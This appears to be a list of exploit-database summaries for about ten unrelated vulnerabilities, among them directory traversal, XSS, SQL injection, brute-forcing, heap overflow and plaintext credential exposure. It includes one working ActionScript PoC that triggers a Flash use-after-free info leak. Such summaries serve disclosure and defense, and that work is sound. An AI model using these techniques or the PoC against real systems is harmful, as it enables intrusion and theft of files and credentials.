A directory traversal vulnerability in Cherry Music v0.35.1 allows authenticated users to download arbitrary files from the server. An attacker can send a specially crafted request to the server with a maliciously crafted value parameter containing a list of files to download. This can be exploited to download sensitive files from the server.
This is a limited version of the PoC exploit. It only allows appending to existing mysql config files with weak permissions. It can be exploited on default installations of MySQL on systems with no writable my.cnf config files available.
Airmail implements its user interface using an embedded version of WebKit, furthermore Airmail on OS X will render any URI as a clickable HTML <a href= link. An attacker can create a simple JavaScript URI (e.g., javascript:) which when clicked grants the attacker initial JavaScript execution (XSS) in the context of the application DOM. An attacker can also use a JavaScript URI to read arbitrary files from the local file system.
This exploit is used to reset the password of Vodafone Mobile WiFi devices. It uses a brute-force attack to guess the password and gain access to the device. The exploit is written in Python and uses the urllib2, json, datetime, time, httplib, threading, Queue, and multiprocessing modules.
If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a use-after-free.
There is an info leak in the Transform.colorTransform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Transform. A minimal PoC (ActionScript 2) is as follows:

    this.createEmptyMovieClip("mc", 1);
    var c = new ColorTransform(77, 88, 99, 0.5, 1, 2, 3, 4);
    var t:Transform = new Transform(mc);
    t.colorTransform = c;
    this.createTextField("tf", 2, 0, 0, 2000, 200);
    var ct = ColorTransform;
    var g = flash.geom;
    // Replace the ColorTransform constructor with a getter that frees mc
    g.addProperty("ColorTransform", func, func);
    // Fetching the getter triggers func(), freeing mc while the result is still used
    var q = t.colorTransform;
    tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
    function func() {
        mc.removeMovieClip();
        return ct;
    }
There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8. This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service 'android.security.keystore' from a normal app context without any additional permissions.
This exploit is a Python PoC for a SQL injection vulnerability in Zabbix versions 2.0 to 3.0.4. It allows an attacker to extract the username and password hash of a user, as well as the session ID of a logged-in user, by exploiting a vulnerability in the web interface of Zabbix. The exploit works by sending a malicious payload to the jsrpc.php page of the Zabbix web interface.
LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure: the supplied username and password are stored in plaintext in process memory. A potential attacker could reveal the supplied username and password in order to gain access to the account and associated computers.
Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure: the supplied username and password are stored in plaintext in process memory. A potential attacker could reveal the supplied username and password in order to gain access to the account.